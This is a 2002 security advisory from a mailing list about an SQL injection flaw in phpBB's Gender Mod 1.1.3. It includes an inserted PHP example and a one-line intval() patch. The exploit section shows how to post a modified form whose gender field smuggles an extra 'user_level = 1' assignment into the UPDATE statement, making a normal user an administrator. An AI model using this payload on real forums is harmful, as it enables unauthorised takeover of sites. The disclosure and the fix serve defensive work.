[UNIX] phpBB's Gender Mod Allows Gaining Administrative Privileges
From: support@securiteam.com
Date: 07/29/02
From: support@securiteam.com To: list@securiteam.com Date: Mon, 29 Jul 2002 07:37:29 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
phpBB's Gender Mod Allows Gaining Administrative Privileges
------------------------------------------------------------------------
SUMMARY
In phpBB installations running the official
<http://www.phpbb.com/mods/downloads/index.php?t=sub_pages&cat=6> Gender
Mod, a vulnerability allows a normal user to set her/himself as a forum
administrator.
DETAILS
Vulnerable systems:
* Gender Mod version 1.1.3
Gender Mod is a commonly used modification in official phpBB releases.
The posted "gender" value is placed unchecked into the UPDATE SQL
statement, so additional column assignments can be appended to it. By
supplying the value 'user_level = 1', a remote attacker can gain
administrative privileges on the forum.
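To make the flaw and its fix concrete, the following is an added example (not the Gender Mod's or phpBB's own code) that contrasts the raw interpolation of the posted value with the intval() fix from the patch below; the table name phpbb_users, the column user_gender and the accepted gender range are assumptions.

```php
<?php
// Added example, not code from the Gender Mod or phpBB.
// Table name, column name and the valid gender range (0..2) are assumed.

// Vulnerable pattern: the raw POST value is interpolated into the SQL text,
// so anything after the number (", user_level = 1") becomes part of the SET list.
function build_update_vulnerable(array $post, int $userId): string
{
    $gender = isset($post['gender']) ? $post['gender'] : 0;
    return "UPDATE phpbb_users SET user_gender = $gender WHERE user_id = $userId";
}

// Hardened pattern: intval() reduces the value to a single integer, and the
// range check keeps only the values the mod actually defines.
function build_update_fixed(array $post, int $userId): string
{
    $gender = isset($post['gender']) ? intval($post['gender']) : 0;
    if ($gender < 0 || $gender > 2) {
        $gender = 0;
    }
    return "UPDATE phpbb_users SET user_gender = $gender WHERE user_id = $userId";
}

// Constructed request bodies: a normal submission and the value from the advisory.
$normal  = ['gender' => '1'];
$hostile = ['gender' => '0, user_level = 1 '];

echo build_update_vulnerable($normal, 42), "\n";
echo build_update_vulnerable($hostile, 42), "\n";
echo build_update_fixed($hostile, 42), "\n";

// Self-check: the hardened statement must never carry a second assignment.
if (strpos(build_update_fixed($hostile, 42), 'user_level') !== false) {
    throw new RuntimeException('sanitisation failed');
}
```

Run with `php example.php`; the second line printed shows why a value that is "just a number" must be cast before it reaches the query.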
Exploit:
1. Save the User Profile page into your disk to modify it offline.
2. Add the correct full post action address (http://forum.victim.com/...):
<FORM action=http://forum.victim.com/profile.php?sid= method=post encType=multipart/form-data>
3. Modify the HTML Form so that the input field "gender" has value like:
<input type=text name=gender value="0, user_level = 1 ">
4. Load this page in the same browser window where the cookie is still
available.
Patch:
File to patch, forumroot/includes/usercp_register.php:
# Patch
#
#-----[ OPEN ]------------------------------------------
#
forumroot/includes/usercp_register.php
#
#-----[ FIND ]------------------------------------------
#
$gender = ( isset($HTTP_POST_VARS['gender']) ) ? $HTTP_POST_VARS['gender'] : 0;
#
#-----[ REPLACE AS ]------------------------------------
#
$gender = ( isset($HTTP_POST_VARS['gender']) ) ? intval($HTTP_POST_VARS['gender']) : 0;
#
#-----[ SAVE/CLOSE/UPLOAD THIS FILE ]-------------------
#
# EoP
ADDITIONAL INFORMATION
The information has been provided by <mailto:trungonly@yahoo.com>
langtuhaohoa caothuvolam.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.